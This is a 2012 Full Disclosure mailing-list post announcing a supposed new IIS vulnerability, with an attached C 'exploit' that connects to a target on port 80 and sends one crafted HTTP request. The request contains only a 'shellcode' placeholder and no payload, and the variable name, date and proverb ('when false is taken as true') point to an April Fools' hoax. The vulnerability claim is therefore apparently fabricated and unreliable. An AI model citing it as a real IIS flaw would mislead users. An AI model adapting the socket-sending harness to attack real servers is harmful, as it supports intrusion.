Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

FW: iis bug
From: yuange <yuange1975 () hotmail com>
Date: Sun, 1 Apr 2012 07:51:09 +0000



 the exp file.  /*  iisexp41.c  ver4.1 copy by @yuange1975 2012.4.1
  假作真时真亦假。  http://weibo.com/yuange1975
  http://twitter.com/yuange75
  http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html
*/
#include <stdio.h>
#include <stdlib.h>#include <winsock2.h>
#include <windows.h>
#include <mswsock.h>
#include <wsnwlink.h>
#include <ws2tcpip.h>
#include <process.h>    /* _beginthread, _endthread */
#include <errno.h>
#include <io.h>
#include <conio.h>#pragma comment(lib,"ws2_32")
#pragma comment(lib,"Mswsock")char  *AprilFoolsDay ="GET /AprilFools'Day.php  
HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n"; static unsigned int maybe_lookup_host(char* name) 
{
  unsigned long ulAddr = INADDR_NONE;  /* Don't bother resolving raw IP addresses, naturally. */
  ulAddr = inet_addr((char*)name); 
  if ( ulAddr != INADDR_NONE && ulAddr != INADDR_ANY )
   return (unsigned int)ulAddr;  return 0;
}int do_exp(char *hostname,unsigned int port)
{
    SOCKET hScoket = INVALID_SOCKET;
 struct sockaddr_in sin;
 unsigned int addr=0;
 int write_res = 0;
 char * crash_buf=NULL;
 int crash_buflen=0; /*
     create SOCKET
  */
 hScoket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0/*WSA_FLAG_OVERLAPPED*/); 
 if (hScoket == INVALID_SOCKET) { 
  printf_s("WSASocket function failed with error = %d\n", WSAGetLastError() );
  return -1;
 }   /* Resolved IP address          */
 addr = maybe_lookup_host(hostname); sin.sin_family = AF_INET;
 sin.sin_port   = htons(port);
 memcpy(&sin.sin_addr,&addr,4); /*
     connect
  */
 if ( connect(hScoket, (struct sockaddr*) &sin, sizeof(struct sockaddr_in) ) == SOCKET_ERROR) {
  if ( WSAEWOULDBLOCK != WSAGetLastError() ) {
   closesocket(hScoket);
   printf_s("connect function failed with error: %ld\n", WSAGetLastError());
   return -1;
  }
 } 
 
 printf("[*] connected to %s:%d\n",hostname,port);
 
 //build_crash_package(&crash_buf,&crash_buflen); crash_buf = AprilFoolsDay;
 crash_buflen = strlen(AprilFoolsDay); 
  /*
      send data to remote target
   */
  write_res = send( hScoket,
                 crash_buf,
                       crash_buflen,
                       0);  
  
  printf("[*] send %d bytes\n",write_res);  
  closesocket(hScoket);
 return 0;
}int main(int argc, const char **argv)
{
    int iResult;
 int count=0;
    char * target_ip = (char*)argv[1];
 WSADATA wsaData; if ( !target_ip || argc < 2 ) {
  printf_s("usage: <target_ip>\n");
  return 0;
 }
  
 
 /* Initialize Winsock */
 iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
 if (iResult != 0) {
  printf_s("WSAStartup failed: %d\n", iResult);
  return -1;
 } do_exp(target_ip,80);
 
 /* clean - win socket */
 WSACleanup(); return 0;
}
  From: yuange1975 () hotmail com
To: full-disclosure () lists grok org uk
Subject: iis bug
Date: Sun, 1 Apr 2012 03:30:29 +0000










iis new bug:
 
http://weibo.com/yuange1975
 
poc:
 
char  *AprilFoolsDay ="GET /AprilFools'Day.php  
HTTP/1.1\r\nHOST:http://weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";; 

 
                                                                                  

Attachment: iisexp41.c
Description:

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • FW: iis bug yuange (Apr 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault